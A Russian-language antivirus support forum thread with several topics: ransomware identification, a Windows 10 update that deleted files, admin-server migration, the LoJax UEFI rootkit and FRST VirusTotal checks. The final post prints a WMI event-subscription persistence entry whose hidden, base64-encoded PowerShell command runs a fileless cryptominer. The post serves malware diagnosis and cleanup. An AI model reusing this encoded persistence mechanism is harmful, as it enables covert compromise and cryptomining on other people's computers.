судя, по id ransomware файлы [B]дешифруемы[/B]
https://id-ransomware.malwarehunterteam.com/identify.php?case=4995c148d8ebb1527da228b74b768ef5e2437f58

если у вас есть лицензия на продукты ESET, можно обратиться за помощью в расшифровке в [email protected]

@dion den,

добавьте образ автозапуска системы, в которой было шифрование
+
несколько зашифрованных файлов в архиве.

здравствуйте,
надо скачать актуальную версию продукта ESET с оф.сайта, установить и активировать установленный продукт с помощью купленной вами лицензии.

Reports are coming in that users are running into many issues after installing the Windows 10 October 2018 update. The biggest problem is that people have found that huge amounts of their documents and other files were deleted after the update was installed.

With the amount of issues that users are currently seeing, it may be wise to defer the installation of this update until Microsoft has had more time to resolve the bugs that users are seeing.  Information on how to do this will be explained at the end of the article.
-------------------
Появляются сообщения о том, что после установки обновления Windows 10 октября 2018 года пользователи сталкиваются со многими проблемами. Самая большая проблема заключается в том, что люди обнаружили, что огромное количество их документов и других файлов было удалено после установки обновления.

С учетом количества проблем, которые пользователи видят в настоящее время, может быть разумным отложить установку этого обновления до тех пор, пока у Microsoft не будет больше времени для устранения ошибок, которые видят пользователи. Информация о том, как это сделать, будет объяснена в конце статьи.

из отзывов пользователей (маты пропущены):
[QUOTE]Моя папка «Документы» была удалена так, что все мои личные документы (документы Word, электронные таблицы и т. Д.) Исчезли. Это на SSD NVMe с TRIM. Все ушли.
Мои последние резервные копии являются древними.[/QUOTE]

https://www.bleepingcomputer.com/news/microsoft/missing-files-bugs-reported-after-windows-10-october-2018-update/

да, проблема.
(в таких случаях надо пробную задачу создать для 1-2 клиентов, и убедиться что она сработала как надо,
тогда меньше шансов совершить ошибку на большой группе клиентов)
теперь только вручную править конфигурацию на клиентах, или через импорт файла конфигурации, который необходимо предварительно создать.

как вариант (без сохранения баз данных):

1. поднять второй сервер администрирования на втором ПК,
2. на первом сервере создать задачу по изменению настроек администрирования для всех клиентов.
   (указать в новых настройках имя (адрес) второго сервера администрирования)
3. дождаться пока выполнятся задачи, и все клиенты будут подключены к новому серверу администрирования.
4. удалить первый сервер администрирования с первого компа

[QUOTE]RP55 RP55 написал:
Первый практический UEFI rootkit https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/ [/QUOTE]
русский перевод статьи на xakep.ru

[QUOTE]Эксперты компании ESET рассказали об обнаружении вредоносной кампании, в ходе которой был задействован первый известный руткит для Unified Extensible Firmware Interface (UEFI). Ранее подобное обсуждалось лишь с теоретической точки зрения на ИБ-конференциях.

Исследователи пишут, что руткит для UEFI использует группа ... хакеров, известная под названиями APT28, Sednit, Fancy Bear, Strontium, Sofacy и так далее. По данным компании, зафиксирован как минимум один случай успешного внедрения вредоносного модуля во флеш-память SPI, что гарантирует злоумышленникам не только возможность сохранить присутствие в системе после переустановки ОС, но и после замены жесткого диска.

Для внедрения руткита злоумышленники используют малварь LoJax — «близнеца» легитимного решения LoJack от компании Absolute Software, созданного для защиты устройств от утери и кражи. Этот инструмент встраивается в UEFI и позволяет, к примеру, отслеживать местонахождение устройства или удаленно стереть данные.

Появление вредоносных версий LoJack было замечено аналитиками Arbor Networks еще весной текущего года. Тогда специалисты писали, что преступники незначительно изменили инструмент таким образом, чтобы он связывался с их управляющими серверами, а не с инфраструктурой Absolute Software. Эксперты Arbor Networks называли LoJax «идеальным двойным агентом», так как он может удаленно выполнить произвольный код в системе и практически не отличается от легитимной версии инструмента.[/QUOTE]

https://xakep.ru/2018/09/28/lojax/

@Деньга Большов,
добавьте образ автозапуска для проверки и очистки системы,
возможно остались вредоносные тела
[QUOTE]Файлы прикрепить не могу... - пишет "При сохранении файла произошла ошибка."[/QUOTE]
несколько зашифрованных файлов лучше добавить в архив

в FRST добавили скриптовую проверку файлов на Вирустотал

[CODE]CreateRestorePoint:
CloseProcesses:
VirusTotal: C:\ProgramData\mbhelper.exe;C:\Windows\system32\drivers\WinD64.sys;C:\Windows\system32\drivers\WinD64loader.sys;C:\Users\User\AppData\Local\Temp\F891.tmp.exe;C:\Users\User\AppData\Local\Temp\nsw4A4A.tmp\System.dll
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program Files (x86)\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
CHR HKLM\...\Chrome\Extension: [looohgelibjoplmkhecmalapkgadkfcc] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [looohgelibjoplmkhecmalapkgadkfcc] - hxxps://clients2.google.com/service/update2/crx[/CODE]

с выводом результата в fixlog:

[QUOTE]Restore point was successfully created.
Processes closed successfully.
VirusTotal: C:\ProgramData\mbhelper.exe => https://www.virustotal.com/file/8345f6e1d8ce126f21e9bcf6e4d68f4548ccfe24634fbb4a21d­c10ded01b6117/analysis/1538008986/
VirusTotal: C:\Windows\system32\drivers\WinD64.sys => https://www.virustotal.com/file/5e2f7b4bf66c8488b5e45fa6cc4634277d6698efd9f0c484b40­69c5785149f6f/analysis/1508227164/
VirusTotal: C:\Windows\system32\drivers\WinD64loader.sys => https://www.virustotal.com/file/83bfa50a528762ec52a011302ac3874636fb7e26628cd7acfbf­2bdc9faa8110d/analysis/1536868377/
VirusTotal: C:\Users\User\AppData\Local\Temp\F891.tmp.exe => https://www.virustotal.com/file/0ca76058898c0032b16df7f2336aee1a8992cc8c024b1a84f1d­4b0e8d26c1af7/analysis/1534760526/
VirusTotal: C:\Users\User\AppData\Local\Temp\nsw4A4A.tmp\System.dll => (3) Error
"HKLM\Software\Wow6432Node\MozillaPlugins\@t.garena.com/garenatalk" => removed successfully
[/QUOTE]

похоже, здесь используется запуск через WMI закодированного скрипта, возможно именно этот скрипт содержит запуск майнера, связанного с процессом msiexec

[QUOTE]Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла                   POWERSHELL.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
                           
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
File_Id                     4A5BC7F377000
Linker                      9.0
Размер                      473600 байт
Создан                      14.07.2009 в 03:49:07
Изменен                     14.07.2009 в 05:39:20
                           
TimeStamp                   13.07.2009 в 23:49:07
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                           
Оригинальное имя            PowerShell.EXE.MUI
Версия файла                6.1.7600.16385 (win7_rtm.090713-1255)
Описание                    Windows PowerShell
Производитель               Microsoft Corporation
                           
Доп. информация             на момент обновления списка
SHA1                        5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC
MD5                         852D67A27E454BD389FA7F02A8CBE23F
                           
Namespace                   \\.\root\subscription
Consumer_Name               FsxxleConsumer
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatepowershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg­AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt­AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA­KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4­AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A­cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj­ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy­AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA­YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs­AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA­aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp­AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA­bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl­AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA­IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg­ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA­aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw­AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A­ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1­AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA­eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0­AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A­ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh­AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA­KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz­AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA­WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl­AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA­SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu­AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A­ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo­AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=
Filter_Name                 FsxxleFilter
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
Consumer = "CommandLineEventConsumer.Name=\"FsxxleConsumer\"";
Filter = "__EventFilter.Name=\"FsxxleFilter\"";
};

#MOF_Event#                
instance of __EventFilter
{
EventNamespace = "root\\cimv2";
Name = "FsxxleFilter";
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
CommandLineTemplate = "powershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg­AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt­AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA­KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4­AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A­cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj­ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy­AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA­YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs­AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA­aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp­AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA­bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl­AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA­IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg­ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA­aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw­AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A­ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1­AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA­eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0­AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A­ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh­AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA­KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz­AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA­WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl­AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA­SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu­AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A­ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo­AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=";
Name = "FsxxleConsumer";
};[/QUOTE]